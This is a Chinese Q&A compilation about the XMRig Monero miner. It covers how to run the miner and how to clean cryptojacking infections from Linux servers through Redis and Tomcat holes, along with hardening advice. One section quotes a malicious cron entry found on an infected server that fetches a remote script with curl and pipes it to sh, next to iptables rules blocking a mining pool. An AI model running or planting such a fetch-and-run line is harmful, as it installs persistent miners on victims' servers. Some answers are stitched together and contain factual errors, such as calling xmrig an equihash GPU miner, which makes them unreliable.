伺服器上啟動xmrig挖礦
A. xmrigminer是什麼程序
是一款用於AMD/Nvidia顯卡的高性能equihash挖礦軟體。
可以通過進入運行自定義設置內容就可以進行挖礦。
B. xmrig.exe 是什麼進程
可以啟動任務管理器,在進程里的這個進程上,右鍵,打開文件位置,看是在哪個文件夾下,應該能大致知道是什麼軟體的進程
C. 使用XMRig CPU i5-9400F挖礦安全嗎,同時顯卡2060也在挖礦,有什麼需要注意的地方,多謝了。
挖礦沒有什麼安全不安全的。就是防靜電,放電壓波動過載,出於保險需要裝一台不間斷UPS穩壓電源。
D. linux被挖礦重裝系統能清除嗎
可以的
xmrig是一種挖礦病毒,通常會搶占伺服器的資源,導致伺服器超負荷運轉,出現服務宕機的情況。
E. 如何用Linux伺服器挖礦教程
今天早上起來一看,伺服器腳本一個都沒有啟動!甚是奇怪,遠程登錄伺服器,也是異常的卡,直到最後卡死,只好重新啟動伺服器!
啟動之後沒一會又會變卡,越來越卡,top查看進程!不覺又奇怪的進程,因為平常也不經常看!所以自己也搞不明白怎麼回事兒!只好到群里問了問,說是被挖礦的掛了木馬文件了,是由於redis的漏洞!
後來我自己發現,原來redis遠程可以直接登錄,原以為redis和mysql不開放登錄許可權就不會支持遠程登錄呢,看來是我想多了
看了好長時間才發現一個異常的進程,自啟的進程 molibe !
找到進程位置 ps -ef|grep molibe ;
在tmp目錄下,打開一看的確是有
chmod -x molibe 取消執行許可權在來到/var/spool/cron下,cat root 查看定時器的執行發現之前腳本都被改了,顧不得刪除cron,service crond restart 重新啟動,再有就時kill 掉molibe進程
這樣大概整個就結束了!但是根本是因為redis漏洞,所以還是補上吧
首先修改redis'埠,找到redis.conf文件 port **** 修改埠號再有就是必須修改密碼 # requirepass ******** 去除#號重新啟動 /redis/src/redis-server /redis/redis-conf
啟動成功之後
redis/redis-cli -p ****(埠) -a *****(密碼)
F. xml幣怎麼挖
具體步驟如下:
門羅幣xmr挖礦需要准備兩個軟體:一個是門羅幣錢包,第二個是門羅幣挖礦程序。
門羅幣錢包很簡單,一般只要下載帶圖形界面的錢包即可。
主要介紹門羅幣的最新挖礦程序的使用。
門羅幣挖礦程序使用最多的是一塊開源軟體叫xmrig 當前版本6.5.0,下面有各個操作系統的安裝包,根據電腦選擇macos版或者 windows選擇下面對應的win64版本,解壓出來有三個文件config,json是配置文件xmrig是執行程序,打開config,json找到pools修改這三項,上面的donate-level:1 的意思是你挖幣的1%收入會教給xmrig這個軟體的開發者,如果你不打算付這百分之一,需要修改源程序並編譯,其實也不難,最後在終端輸入cd到解壓目錄並輸入./xmrig 執行這個程序就可以挖礦了。
G. 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白
1. 關閉訪問挖礦伺服器的訪問
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。
3. pkill minerd ,殺掉進程
4. service stop crond 或者 crontab -r 刪除所有的執行計劃
5. 執行top,查看了一會,沒有再發現minerd 進程了。
6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。
下載腳本的語句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:
View Code
解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:
1. 修復 redis 的後門,
配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號
3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.
H. 如何通過雲計算伺服器實現比特幣挖礦
各公有雲廠商都明確要求不允許使用雲伺服器進行挖礦,否則會被封禁的;
挖礦主要使用的是GPU,目前各公有雲廠商提供的GPU伺服器都比較貴的,從性價比上來說不劃算,還不如用專用晶元;
當然,有黑客通過漏洞入侵伺服器,在上面植入挖礦程序和腳本,進行挖礦操作,但這個本身是不合法的行為。
I. 求助伺服器被挖礦程序入侵,如何排查
新客戶於最近向我們SINE安全公司咨詢,說他的伺服器經常卡的網站無法打開,遠程連接
伺服器的慢的要命,有時候PING值都達到300-500之間,還經常掉包,聽客戶這么一說,一般
會判斷為受到了CC+DDOS混合流量攻擊,再具體一問,說是機房那面沒有受到流量攻擊,這
就有點奇怪了,不是流量攻擊,還導致伺服器卡,網站無法打開,這是什麼攻擊?為了解決客
戶伺服器卡的問題,我們隨即安排安全工程師對他的Linux伺服器進行了安全檢測與安全部署。
挖礦木馬還設計了挖礦進程如果被客戶強制停止後,會自動啟動繼續挖礦,達到不間斷的挖礦,
仔細檢查發現是通過設置了每個小時執行任務計劃,遠程下載shell挖礦木馬,然後執行,檢查
當前進程是否存在,不存在就啟動挖礦木馬,進行挖礦。
對客戶的linux伺服器進行詳細了安全檢測發現幸虧沒有加密伺服器的數據,以及感染蠕蟲的病
毒,如果數據被加密那損失大了,客戶是做平台的,裡面的客戶數據很重要,找出挖礦木馬後,
客戶需要知道伺服器到底是如何被攻擊的? 被上傳挖礦木馬的? 防止後期再出現這樣的攻擊
狀況。
通過我們安全工程師的安全檢測與分析,發現該伺服器使用的是apache tomcat環境,平台的開
發架構是JSP+oracle資料庫,apache tomcat使用的是2016年的版本,導致該apache存在嚴重
的遠程執行命令漏洞,入侵者可以通過該漏洞直接入侵伺服器,拿到伺服器的管理員許可權,
SINE安全工程師立即對apache 漏洞進行修復,並清除木馬,至此問題得以解決,客戶伺服器
一切穩定運行,網站打開正常。